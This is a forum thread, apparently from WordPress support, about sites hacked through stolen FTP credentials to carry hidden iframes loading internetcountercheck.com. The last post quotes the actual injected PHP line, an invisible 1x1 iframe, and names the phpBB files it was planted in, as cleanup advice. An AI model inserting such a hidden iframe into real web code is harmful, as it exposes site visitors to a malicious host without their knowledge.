[resolved] site hacked - internetcountercheck.com/?click#95609 (14 posts)

  1. Boris
    Posted 6 years ago #


    I have a site and it got hacked a few days ago. I tried to delete all files and upload them again, but the virus warning appeared again a short while later.

    What happened was that on many pages there was suddenly an iframe from internetcountercheck.com.

    My anti virus programme shows me this warning:


    I googled that website and now there are already around 1000 hits. When my site got hit it was only a handful, so maybe that thing is spreading :)

    Does anyone have any suggestions on what else I could do to get rid of this short of completely demolishing everything?

    When I set the site up I had changed the database prefix, changed the admin login, hid the wp version number, but it still happened. I'm running WP 2.8, and the usual array of plugins, like bad behaviour, nextgen gallery, wordtube, all in one seo and a few others, all of them up to date or at least they were. I'm in India at the moment and I can't really access the site anymore. As soon as I do my internet connection slows down to a crawl and after a while my laptop surrenders...

    Any help would really be appreciated.


  2. jingles689
    Posted 6 years ago #

    do you use a host service? Look at what happened to mine today:
    homeiswherethecarsparked.com, it has a big black owned hack page on it and my self host service is sorting it out, this is a big problem with wordpress.org blogs, it open source and anyone can screw it

  3. whooami
    Posted 6 years ago #


    I'm running WP 2.8

    and where did you get that? since the latest version of wordpress is 2.7.1

  4. jingles689
    Posted 6 years ago #


  5. jingles689
    Posted 6 years ago #

  6. ziation
    Posted 6 years ago #

    Open source has nothing to do with secure software. Anyone who suggests it does has no clue what they are talking about. Security through obscurity is not an approved method and should never be relied upon. Look at Windows and Internet Explorer, they are closed source and are the most hacked pieces of software around.

    You should leave your host for ignorance alone.

  7. Boris
    Posted 6 years ago #

    whooami, it's called SVN :)

    we're still being haunted by that bloody iframe, but apparently the people behind it somehow got our ftp credentials (our hosting service told us that the files were uploaded via ftp), so we changed those. Today I had a look and it's come again...

  8. t31os
    Posted 6 years ago #

    Then host is not storing your account information securely, or someone else with FTP details yourself or another admin has been infected and is unknowningly supplying details to these individuals.

    If you're the only one with access to the details, it's either you or the host.

    If you're confident it's not you, then get a decent host who can secure you account and/or FTP details properly.

  9. UseShots
    Posted 6 years ago #

    @travel-junkie: What FTP client do you use? Do you store your FTP passwords inside it? Some spyware programs can steal passwords from program settings.

  10. Boris
    Posted 6 years ago #

    I use filezilla and yes, i do store my details in there.

    My host is all-inkl and they are usually excellent.

  11. thesystemroot
    Posted 6 years ago #

    Hi,I have the same problem with my blog, the host might be the culprit?.
    As I have tried changing the administrator password, and FTP that can no longer be.

  12. BernardBorealis
    Posted 6 years ago #

    Maybe this will help:

    Additionally, if you have register_globals enabled that may cause a hack. If you have too lenient of permissions that may cause a hack as well. Usually you will not need higher permissions than 755 on directories and 644 on files. -Just some more stuff to throw into the melee.

  13. Boris
    Posted 6 years ago #

    Turned out that after we had changed the ftp password one file didn't get overwritten when we uploaded WP again, so changing the ftp password does help.

  14. Y-E
    Posted 5 years ago #

    the attack is same with me..
    that happened to my phpBB...

    target file (for phpBB):

    1. includes/session.php
    2. includes/acp/acp_main.php

    I still dont know how to secure my phpBB bcoz the version was old.
    Im lazy to download n reinstall that phpBB new version...

    For temporary, I just fix my phpBB by removing this code in those two files:

    echo "<iframe src=\"http://internetcountercheck.com/?click=82845921\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";

Topic Closed

This topic has been closed to new replies.

About this Topic